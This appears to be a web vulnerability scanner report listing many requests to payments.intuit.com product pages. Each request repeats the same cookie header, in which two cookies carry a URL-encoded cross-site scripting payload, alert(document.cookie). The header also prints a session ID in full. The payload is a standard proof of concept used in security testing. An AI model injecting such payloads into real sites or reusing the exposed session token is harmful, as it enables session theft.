Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
